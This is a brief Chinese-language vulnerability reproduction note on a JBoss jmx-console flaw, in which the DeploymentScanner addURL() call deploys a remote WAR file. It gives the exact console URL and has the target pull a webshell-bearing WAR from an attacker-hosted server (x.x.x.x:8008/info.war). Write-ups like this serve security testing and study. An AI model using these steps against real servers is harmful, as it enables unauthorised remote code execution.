0x00漏洞介绍
JBOSS默认配置会有一个后台漏洞,漏洞发生在jboss.deployment命名空间,中的addURL()函数,该函数可以远程下载一个war压缩包并解压。如果压缩包里含有webshell文件,是直接可以解析的。
0x01 漏洞复现
http://192.200.30.43:8081/jmx-console/
找到业务部署的入口,通过addurl,进行远程war包部署,访问地址:http://192.200.30.43:8081/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
vps上起http server,放置war包,http://x.x.x.x:8008/info.war
填入paramvalue,点击invoke进行部署
成功部署info.war包
获取webshell